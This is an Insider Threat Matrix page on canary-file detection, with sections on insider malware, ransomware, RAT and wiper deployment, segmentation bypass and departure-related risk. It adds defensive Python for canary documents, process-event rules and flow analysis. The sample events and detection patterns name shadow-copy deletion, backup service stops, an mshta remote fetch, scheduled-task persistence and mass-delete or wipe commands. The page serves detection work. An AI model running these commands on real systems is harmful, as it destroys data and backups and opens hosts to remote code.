
Insider Threat Matrix™
  • ID: DT009
  • Created: 25th May 2024
  • Updated: 18th September 2024
  • Platforms: Windows, Linux, MacOS
  • Contributor: The ITM Team

Cyber Deception, File Canary

Files seeded with canary tokens act as tripwires: opening the file (for a token-embedded document that calls home) or any read of it (for a canary watched by file-access auditing) produces an alert, giving investigators early warning of collection activity before a data exfiltration infringement occurs.

Placed deliberately on endpoints, network shares, FTP servers, and collaboration platforms such as SharePoint or OneDrive, canary files have no legitimate business use, so any access to them is a high-fidelity signal and can raise an alert automatically. Two practical points follow from that. The alert must record who accessed the file, from which host, and when, or it cannot be correlated with the subject's other activity. And backup jobs, search indexers, and antivirus scanners will also touch the file, so their service accounts need to be excluded from alerting or the tripwire will quickly be dismissed as noise.
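The document-based variant described above, as an added example that is not ITM's own tooling: the script builds a canary .docx whose settings part carries an external "attached template" relationship, which Word resolves when the document is opened, and then matches hits on the listener's access log back to the file that was planted. The listener host name (CANARY_HOST), the token path scheme and the sample log lines are assumptions constructed for the example.

```python
"""Added example, not ITM's own tooling: generate a canary .docx and match
listener hits back to the planted file.  Word resolves the document's
'attached template' relationship when the file is opened; if that
relationship points at a URL you control, the fetch is the tripwire.
CANARY_HOST, the token scheme and the log lines are assumptions."""
import io
import re
import secrets
import zipfile
from xml.sax.saxutils import escape

CANARY_HOST = "canary.example.internal"  # assumption: your HTTP listener

XML_HDR = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
CONTENT_TYPES = XML_HDR + (
    f'<Types xmlns="{CT_NS}">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
    '</Types>')
ROOT_RELS = XML_HDR + (f'<Relationships xmlns="{PKG_NS}"><Relationship Id="rId1" '
                       f'Type="{R_NS}/officeDocument" Target="word/document.xml"/></Relationships>')
DOC_RELS = XML_HDR + (f'<Relationships xmlns="{PKG_NS}"><Relationship Id="rId1" '
                      f'Type="{R_NS}/settings" Target="settings.xml"/></Relationships>')


def new_token() -> str:
    """Per-file secret; 16 hex chars, which is what TOKEN_PATH_RE accepts."""
    return secrets.token_hex(8)


def canary_url(token: str) -> str:
    return f"http://{CANARY_HOST}/t/{token}.dotx"


def build_canary_docx(token: str, decoy_text: str) -> bytes:
    """Minimal .docx whose settings part carries an *external* attachedTemplate
    relationship to canary_url(token).  The decoy text is the only visible body."""
    document = XML_HDR + (f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r>'
                          f'<w:t>{escape(decoy_text)}</w:t></w:r></w:p></w:body></w:document>')
    settings = XML_HDR + (f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
                          '<w:attachedTemplate r:id="rId1"/></w:settings>')
    settings_rels = XML_HDR + (f'<Relationships xmlns="{PKG_NS}"><Relationship Id="rId1" '
                               f'Type="{R_NS}/attachedTemplate" Target="{canary_url(token)}" '
                               'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", ROOT_RELS)
        z.writestr("word/document.xml", document)
        z.writestr("word/_rels/document.xml.rels", DOC_RELS)
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def read_part(docx_bytes: bytes, name: str) -> str:
    """Pull one XML part back out of a generated file (used to verify it)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.read(name).decode("utf-8")


# Listener side: Apache/nginx "combined" access-log lines, one per request.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
                    r'"(?:GET|HEAD) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TOKEN_PATH_RE = re.compile(r"^/t/(?P<token>[0-9a-f]{16})\.dotx$")


def match_callbacks(log_lines, registry):
    """registry maps token -> where that canary was planted.  One alert per
    request for a known token; unknown tokens (scanners, typos) are dropped
    so that noise against the listener cannot page anyone."""
    alerts = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        p = TOKEN_PATH_RE.match(m["path"])
        if not p or p["token"] not in registry:
            continue
        alerts.append({"token": p["token"], "src": m["src"], "when": m["when"],
                       "planted_at": registry[p["token"]]})
    return alerts


if __name__ == "__main__":
    tok = new_token()
    registry = {tok: r"\\fileserver\finance\Payroll_2024_FINAL.docx"}
    with open("Payroll_2024_FINAL.docx", "wb") as fh:
        fh.write(build_canary_docx(tok, "DRAFT - do not distribute"))
    # Constructed line standing in for what the listener would log on open.
    sample = [f'10.20.30.40 - - [18/Sep/2024:09:14:02 +0000] "GET /t/{tok}.dotx HTTP/1.1" '
              '404 0 "-" "Mozilla/4.0 (compatible; ms-office)"']
    for a in match_callbacks(sample, registry):
        print(f"CANARY {a['planted_at']} opened from {a['src']} at {a['when']}")
```

The listener only needs to log the request; it can answer 404. Keep the token-to-location registry off the share it protects, and note the limits of this variant: the callback depends on the client fetching the template (a host without network access, or Office Protected View, suppresses it), so pair document canaries with file-access auditing on the share for coverage of plain copies.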

Sections

ME028 Delegated Access via Managed Service Providers

An organization entrusts a Managed Service Provider (MSP) with administrative or operational access to its digital environment - typically for IT support, system maintenance, or development functions. This access is often persistent, privileged, and spans sensitive infrastructure or data environments.

 

The means is established when MSP personnel, including potential subjects, are permitted to authenticate into the client's environment from systems or networks entirely outside the client's visibility or jurisdiction. These MSP endpoints may be unmanaged, unmonitored, or physically located in regions where the customer organization's policies, incident response authority, or legal recourse do not apply.

This creates an unobservable access channel: the subject operates from infrastructure beyond the reach of the customer organization's logging, endpoint detection, or identity correlation. The organization is therefore unable to monitor or verify who accessed what, when, or from where, which renders all downstream actions unauditable by the customer organization's internal security teams unless MSP sessions are forced through a client-controlled choke point (a bastion or jump host that records sessions, used with named per-person accounts rather than a shared MSP login) where they can be captured.

 

The exposure can be compounded by the MSP’s internal controls (or lack thereof). Weak credential custody practices, shared administrative accounts, inadequate background checks, or poor workforce segmentation create conditions where privileged misuse or unauthorized access can occur without attribution or immediate detection. The subject does not require escalation—they begin with sanctioned access and operate under delegated trust, often without the constraints applied to internal staff.

 

This structural dependency - privileged access held externally, without enforceable oversight - creates the necessary conditions for an insider infringement to occur with low risk of interruption or accountability.

IF027 Installing Malicious Software

The subject deliberately or inadvertently introduces malicious software (commonly referred to as malware) into the organization’s environment. This may occur via manual execution, automated dropper delivery, browser‑based compromise, USB usage, or sideloading through legitimate processes. Malicious software includes trojans, keyloggers, ransomware, credential stealers, remote access tools (RATs), persistence frameworks, or other payloads designed to cause harm, exfiltrate data, degrade systems, or maintain unauthorized control.

 

Installation of malicious software represents a high-severity infringement, regardless of whether the subject's intent was deliberate or negligent. In some cases, malware introduction is the culmination of prior behavioral drift (e.g. installing unapproved tools or disabling security controls), while in others it may signal malicious preparation or active compromise.

 

This Section is distinct from general “Installing Unapproved Software”, which covers non‑malicious or policy-violating tools. Here, the software itself is malicious in purpose or impact, even if delivered under benign pretenses.

PR004.001 Network File Exploration

A subject may search for, or otherwise explore files on a Network Attached Storage (NAS) device to identify sensitive information.

PR004.002 Collaboration Platform Exploration

A subject may search for or otherwise explore files on a collaboration platform (such as SharePoint, OneDrive, or Confluence) to identify sensitive or valuable information.

PR006.003 Security Enumeration via File System

A subject attempts to identify security software on a target system by looking through the file system to identify relevant directories or files.

IF027.002 Ransomware Deployment

The subject deploys ransomware within the organization’s environment, resulting in the encryption, locking, or destructive alteration of organizational data, systems, or backups. Ransomware used by insiders may be obtained from public repositories, affiliate programs (e.g. RaaS platforms), or compiled independently using commodity builder kits. Unlike external actors who rely on phishing or remote exploitation, insiders often bypass perimeter controls by detonating ransomware from within trusted systems using local access.

 

Ransomware payloads are typically compiled executables, often obfuscated with packers or crypters to evade detection. Execution may be initiated from the command line, a scheduled task, a script wrapper, or an automated loader. Encryption routines usually walk common file extensions recursively across every accessible volume, mapped drive, and cloud sync folder. Before detonation the subject may delete volume shadow copies (vssadmin delete shadows) and stop backup agents (net stop) to increase impact; because ordinary users almost never issue these commands, they are among the most reliable precursor signals available to investigators.

 

In some insider scenarios, ransomware is executed selectively: targeting specific departments, shares, or systems, rather than broad detonation. This behavior may indicate intent to send a message, sabotage selectively, or avoid attribution. Payment demands may be issued internally, externally, or omitted entirely if disruption is the primary motive.

IF027.004 Remote Access Tool (RAT) Deployment

The subject deploys a Remote Access Tool (RAT): a software implant that provides covert, persistent remote control of an endpoint or server—enabling continued unauthorized access, monitoring, or post-employment re-entry. Unlike sanctioned remote administration platforms, RATs are deployed without organizational oversight and are often configured to obfuscate their presence, evade detection, or blend into legitimate activity.

 

RATs deployed by insiders may be off-the-shelf tools (e.g. njRAT, Quasar, Remcos), lightly modified open-source frameworks (e.g. Havoc, Pupy), or commercial-grade products repurposed for unsanctioned use (e.g. AnyDesk, TeamViewer in stealth mode). 

 

Functionality typically includes:

 

  • Full GUI or shell access
  • File system interaction
  • Screenshot and webcam capture
  • Credential harvesting
  • Process and registry manipulation
  • Optional keylogging and persistence modules

 

Deployment methods include manual installation, script-wrapped droppers, DLL side-loading, or execution via LOLBins (mshta, rundll32). Persistence is typically achieved through scheduled tasks, registry run keys, or disguised service installations. In some cases, the RAT may be configured to activate only during specific windows or respond to remote beacons, reducing exposure to detection.

IF027.005 Destructive Malware Deployment

The subject deploys destructive malware: software designed to irreversibly damage systems, erase data, or disrupt operational availability. Unlike ransomware, which encrypts files to extort payment, destructive malware is deployed with the explicit intent to delete, corrupt, or disable systems and assets without recovery. Its objective is disruption or sabotage rather than direct financial gain.

 

This behavior may include:

 

  • Wiper malware (e.g. HermeticWiper, WhisperGate, ZeroCleare)
  • Logic bombs or time-triggered deletion scripts
  • Bootloader overwrite tools or UEFI tampering utilities
  • Mass delete or format scripts (format, cipher /w, del /s /q, rm -rf)
  • Data corruption utilities (e.g. file rewriters, header corruptors)
  • Credential/system-wide lockout scripts (e.g. disabling accounts, resetting passwords en masse)

 

Insiders may deploy destructive malware as an act of retaliation (e.g. prior to departure), sabotage (e.g. to disrupt an investigation or competitor), or under coercion. Detonation may be manual or scheduled, and in some cases the malware is disguised as routine tooling to delay detection.

 

Destructive deployment is high-severity and often coincides with forensic tampering or precursor access-based infringements (e.g. file enumeration or backup deletion).
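The precursor and deployment commands named in IF027.002 (shadow copy deletion, backup service stops), IF027.004 (LOLBin launches, run-key, scheduled-task and service persistence) and IF027.005 (mass delete and wipe commands) all surface in process-creation telemetry. The following is an added detection example, not ITM's own tooling: it runs a small rule set over normalized process-creation events and correlates hits per host and user, so that a lone "net stop" does not fire while a shadow-copy deletion, or two different categories of activity from the same subject inside a short window, does. The rule names, severities, the 30-minute window and the sample events are constructed assumptions.

```python
"""Added example, not part of ITM: rule matching over normalized process-creation
events (the shape of Sysmon Event ID 1 or Security 4688 once parsed) for the
precursor commands IF027.002, IF027.004 and IF027.005 describe, then a per-subject
correlation so that a single 'net stop' does not page anyone on its own.
The rule set, scores, window and events are all constructed for illustration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule name, category, severity, pattern over "<image> <command_line>")
RULES = [
    ("shadow_copy_delete", "backup_tamper", 9, re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
        r"|wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("service_stop", "backup_tamper", 5, re.compile(
        r"\b(net1?|sc)(\.exe)?\s+stop\s+\S+", re.I)),
    ("lolbin_launch", "execution", 6, re.compile(
        r"\bmshta(\.exe)?\s+\S*(https?:|\\\\|\.hta\b)"
        r"|\brundll32(\.exe)?\s+\S*\\(users|temp|programdata)\\", re.I)),
    ("persistence_write", "persistence", 7, re.compile(
        r"\breg(\.exe)?\s+add\s+\S*\\currentversion\\run(once)?\b"
        r"|\bschtasks(\.exe)?\s+/create\b|\bsc(\.exe)?\s+create\b", re.I)),
    ("mass_delete_or_wipe", "destructive", 9, re.compile(
        r"\bcipher(\.exe)?\s+/w\b|\bformat(\.com)?\s+[a-z]:"
        r"|\bdel\b(?=.*\s/s\b)(?=.*\s/q\b)|\brm\s+-(rf|fr)\b", re.I)),
]


def match_event(ev):
    """Return [(rule, category, severity)] for every rule the event trips."""
    text = f"{ev.get('image', '')} {ev.get('command_line', '')}"
    return [(n, c, s) for n, c, s, rx in RULES if rx.search(text)]


def correlate(events, window_minutes=30):
    """Group hits by (host, user).  A subject is reported when, inside the window,
    it trips rules from two different categories or any single severity-9 rule.
    Only the first qualifying window per subject is reported."""
    window = timedelta(minutes=window_minutes)
    hits = defaultdict(list)
    for ev in events:
        for name, cat, sev in match_event(ev):
            hits[(ev["host"], ev["user"])].append(
                (datetime.fromisoformat(ev["ts"]), name, cat, sev))
    findings = []
    for (host, user), seq in hits.items():
        seq.sort()
        for t0, *_ in seq:
            win = [h for h in seq if t0 <= h[0] <= t0 + window]
            if len({h[2] for h in win}) >= 2 or max(h[3] for h in win) >= 9:
                findings.append({"host": host, "user": user, "start": t0.isoformat(),
                                 "rules": sorted({h[1] for h in win}),
                                 "score": sum(h[3] for h in win)})
                break
    return findings


SAMPLE_EVENTS = [  # constructed; ts in ISO 8601, image and command line as logged
    {"ts": "2024-09-18T09:14:02", "host": "WS-42", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "command_line": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2024-09-18T09:15:40", "host": "WS-42", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\net.exe", "command_line": "net stop BackupAgent"},
    {"ts": "2024-09-18T09:16:05", "host": "WS-42", "user": "CORP\\jdoe",
     "image": r"C:\Users\jdoe\Downloads\locker.exe", "command_line": "locker.exe"},
    {"ts": "2024-09-18T11:00:00", "host": "WS-07", "user": "CORP\\asmith",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks /create /tn Updater /tr "C:\Users\asmith\AppData\Roaming\svc.exe" /sc onlogon'},
    {"ts": "2024-09-18T12:00:00", "host": "WS-07", "user": "CORP\\asmith",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://cdn.example.net/update.hta"},
    {"ts": "2024-09-18T02:00:00", "host": "SRV-DB", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\net.exe", "command_line": "net stop SQLWriter"},
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"{f['start']} {f['host']} {f['user']} score={f['score']} rules={f['rules']}")
```

With the default window only the WS-42 subject is reported (shadow-copy deletion followed by a service stop); the WS-07 persistence write and LOLBin launch are an hour apart and surface only if the window is widened, and the lone service stop on SRV-DB never does. The command lines this depends on are only present if command-line auditing is enabled for 4688 events (it is off by default) or Sysmon is deployed.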

PR018.008 Bypassing Network Segmentation

A subject bypasses logical or physical network segmentation controls (such as VLANs, ACLs, security groups, or subnets) in order to obtain unauthorized access to systems, services, or data across trust boundaries. This preparation technique commonly manifests through deliberate configuration changes (e.g., modifying ACLs or VLAN assignments), covert tunneling (e.g., SSH, HTTPS reverse tunnels), rogue device introduction (e.g., unmanaged switches or dual-homed devices), or misuse of trusted services (e.g., remote access platforms or admin automation tools that bridge zones).

 

Such actions are often observable via first-time or anomalous cross-segment flows, management plane configuration logs, 802.1X/NAC anomalies, or long-lived encrypted outbound sessions. These techniques typically exploit privileged access, weak change control, or poor posture enforcement.

 

This behaviour may be motivated by a subject’s attempt to escalate access, stage data for exfiltration, evade oversight, or maintain persistence across environments. It is especially critical in environments with sensitive zoning, such as production-to-dev separations, cloud VPC peerings, or physically segmented OT/ICS networks.

 

Investigators should prioritize telemetry correlation across NetFlow/IP Flow Information Export (IPFIX), EDR, DHCP, and identity systems to attribute cross-zone traffic to known assets and subjects. Preserve infrastructure configuration snapshots and identify whether segmentation was circumvented by direct administrative action, covert bridging, or software-level tunnelling.
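As an added example of the telemetry correlation described above (not part of ITM), the script below takes exported flow records, maps both endpoints to a zone, checks the zone pair against the segmentation policy and a learned baseline, flags long-lived encrypted egress as a tunnel candidate, and joins the source address to a DHCP/identity table so each finding names an asset and a subject. It also lists hosts holding leases in more than one zone, which is the signature of a dual-homed bridge. The zone map, allowed pairs, baseline, leases and flows are all constructed.

```python
"""Added example, not ITM's own: flag cross-segment traffic from exported flow
records (NetFlow/IPFIX after collection), joined to a DHCP/identity table so a
flow can be attributed to an asset and a subject.  Zone map, policy, baseline,
leases and flows are all constructed for illustration."""
import ipaddress
from collections import defaultdict, namedtuple

Flow = namedtuple("Flow", "ts src dst dport proto bytes duration_s")

ZONES = [(ipaddress.ip_network(n), z) for n, z in (  # constructed segmentation
    ("10.10.0.0/16", "corp_users"), ("10.20.0.0/16", "prod"), ("10.30.0.0/16", "dev"),
    ("10.40.0.0/24", "ot"), ("10.99.0.0/24", "jump"))]
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Zone pairs the segmentation design permits (source, destination).
ALLOWED_PAIRS = {("corp_users", "jump"), ("jump", "prod"), ("jump", "ot"),
                 ("corp_users", "internet"), ("prod", "internet")}
# (src zone, dst zone, dport) tuples observed over the learning period.
BASELINE = {("jump", "prod", 22), ("jump", "ot", 3389), ("corp_users", "internet", 443),
            ("corp_users", "jump", 22)}
LEASES = [  # ip, hostname, last logged-on user: constructed DHCP + identity join
    ("10.10.5.23", "WS-0523", "CORP\\jdoe"),
    ("10.30.1.9", "DEV-BUILD-09", "CORP\\svc_ci"),
    ("10.40.0.50", "DEV-BUILD-09", "CORP\\svc_ci"),  # same host, second NIC in OT
    ("10.99.0.5", "JUMP-01", None),
]
LEASE_BY_IP = {ip: (host, user) for ip, host, user in LEASES}
TUNNEL_PORTS = {22, 443}      # encrypted egress ports a reverse tunnel would use
LONG_SESSION_S = 3600         # anything this long to the internet deserves a look


def zone_of(ip):
    addr = ipaddress.ip_address(ip)
    for net, zone in ZONES:
        if addr in net:
            return zone
    return "unknown_internal" if any(addr in n for n in RFC1918) else "internet"


def analyze(flows):
    """One finding per cross-zone flow with at least one reason attached."""
    findings = []
    for f in flows:
        sz, dz = zone_of(f.src), zone_of(f.dst)
        if sz == dz:
            continue
        reasons = []
        if (sz, dz) not in ALLOWED_PAIRS:
            reasons.append("policy_violation")          # segmentation bypassed
        elif (sz, dz, f.dport) not in BASELINE:
            reasons.append("first_seen_pair_port")      # allowed zones, new service
        if dz == "internet" and f.dport in TUNNEL_PORTS and f.duration_s >= LONG_SESSION_S:
            reasons.append("long_lived_encrypted_egress")  # tunnel candidate
        if reasons:
            host, user = LEASE_BY_IP.get(f.src, (None, None))
            findings.append({"ts": f.ts, "src": f.src, "dst": f.dst, "dport": f.dport,
                             "zones": (sz, dz), "host": host, "user": user, "reasons": reasons})
    return findings


def dual_homed(leases):
    """Hosts holding addresses in more than one zone: a bridge between segments."""
    zones = defaultdict(set)
    for ip, host, _ in leases:
        zones[host].add(zone_of(ip))
    return {h: sorted(z) for h, z in zones.items() if len(z) > 1}


SAMPLE_FLOWS = [  # constructed
    Flow("2024-09-18T09:14:02", "10.10.5.23", "10.20.3.4", 5432, "tcp", 48_000_000, 120),
    Flow("2024-09-18T09:20:00", "10.99.0.5", "10.20.3.4", 22, "tcp", 120_000, 900),
    Flow("2024-09-18T09:30:00", "10.10.5.23", "198.51.100.7", 443, "tcp", 9_500_000, 7200),
    Flow("2024-09-18T10:02:10", "10.30.1.9", "10.40.0.17", 502, "tcp", 4_000, 5),
    Flow("2024-09-18T10:05:00", "10.99.0.5", "10.40.0.17", 22, "tcp", 30_000, 300),
    Flow("2024-09-18T10:06:00", "10.10.5.23", "10.10.7.8", 445, "tcp", 2_000_000, 40),
    Flow("2024-09-18T10:07:00", "10.10.5.23", "198.51.100.7", 443, "tcp", 60_000, 30),
]

if __name__ == "__main__":
    for fi in analyze(SAMPLE_FLOWS):
        print(fi)
    print("dual-homed:", dual_homed(LEASES))
```

The first sample flow (a user workstation reaching a production database directly) and the dev-to-OT flow are policy violations regardless of baseline; the jump-to-OT SSH session is permitted but new, so it is reported as first-seen rather than as a breach; the two-hour 443 session from the same workstation is the tunnel candidate. Keep the DHCP join time-aware in practice, since a lease table snapshot attributes a flow to whoever held the address at the time it is queried, not when the flow happened.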

MT003.001 Workforce Reduction

The subject is affected by an involuntary organizational decision to reduce headcount, commonly referred to as a workforce reduction, layoff, or redundancy. Unlike terminations for other reasons, workforce reduction typically affects multiple employees at once and is driven by budget constraints, restructuring, or strategic realignment.

 

A subject affected by workforce reduction may experience acute emotional responses (particularly resentment, betrayal, or perceived devaluation) which can develop into retaliatory or self-serving behaviors. These emotional states, when combined with continued access to internal systems, can motivate infringements.

 

Subjects impacted by workforce reductions may engage in infringements during the period between notification and final termination. When the workforce reduction is publicly known, subjects may further rationalize inappropriate actions as justified by circumstance or organizational failure. Investigators should consider the timing of the reduction announcement, the subject’s level of access, and any prior indicators of behavioral drift, before and during the offboarding window. Elevated risk is especially present where access revocation is delayed beyond a few hours after notification.

MT003.002 Resignation

The subject initiates their voluntary departure from the organization, typically through formal resignation. While not inherently malicious, resignation marks a critical inflection point, particularly when paired with future employment at a competitor, ongoing interpersonal conflict, or dissatisfaction with organizational direction.

 

Subjects who resign may experience a shift in loyalty, a reduced sense of accountability, a weakened sense of confidentiality, or surface a previously held belief that organizational data is now personally justifiable to retain. These attitudes may lead to pre-exit infringement such as covert (or overt) data transfers to personal systems or accounts.

 

In many cases, resignation can introduce a false sense of finality or detachment, wherein the subject no longer adheres to internal policy boundaries. Risk is elevated during the notice period, especially in environments with weak offboarding processes.

MT003.003 Termination for Cause

The subject is involuntarily removed from the organization due to misconduct, performance failure, policy breach, or other cause-based grounds. Unlike workforce reductions (which typically involve a process and/or negotiation), terminations for cause are highly personal and often carry significant emotional charge, especially if the subject perceives the action as unjust, humiliating, or damaging to reputation or career prospects.

 

Subjects terminated for cause may exhibit high-risk behaviors during the pre-termination window (e.g., after being placed under investigation or on performance review) or immediately following notification. Even brief access persistence post-notification can present significant risk. The subject may attempt to delete evidence, exfiltrate data for leverage, disrupt systems, or stage retaliatory actions. The motivational blend of perceived injustice and loss of control often drives urgent, overt behavior with little regard for concealment.

 

Investigators should assess not only the subject’s final actions, but also the timeline of organizational awareness, specifically whether the subject had foreknowledge of the impending termination, and whether access controls were applied in parallel with disciplinary measures.

MT003.005 Contract Expiry

The subject departs the organization due to the planned or unplanned end of a temporary engagement (typically as a contractor, consultant, vendor, or contingent worker). These non-renewals may lack the emotional intensity of involuntary terminations but introduce distinct insider threat risks tied to access posture, entitlement hygiene, and perceived ownership of deliverables.

 

Unlike full-time employees, contract-based personnel are frequently managed outside standard HR and identity governance systems. As a result, they often fall outside formal offboarding processes - retaining access to internal systems, repositories, or communication channels due to limited integration with core IT asset and access management workflows.

 

Separation timelines are commonly informal, unstructured, or delayed - particularly when procurement, business units, and security functions operate in silos. If the subject disagrees with the decision not to renew, or views their contributions as personally owned, data loss or intellectual property exfiltration may occur as a form of leverage or to support future portfolio use.

 

Investigators should recognize that contract-based relationships introduce a structurally distinct insider risk profile, particularly at time of exit. These subjects may exploit offboarding blind spots, reuse credentials, or transfer sensitive materials under the belief that they are exempt from internal policy enforcement. This hubris, combined with reduced visibility and limited organizational recourse, can enable undetected or unchallenged infringement.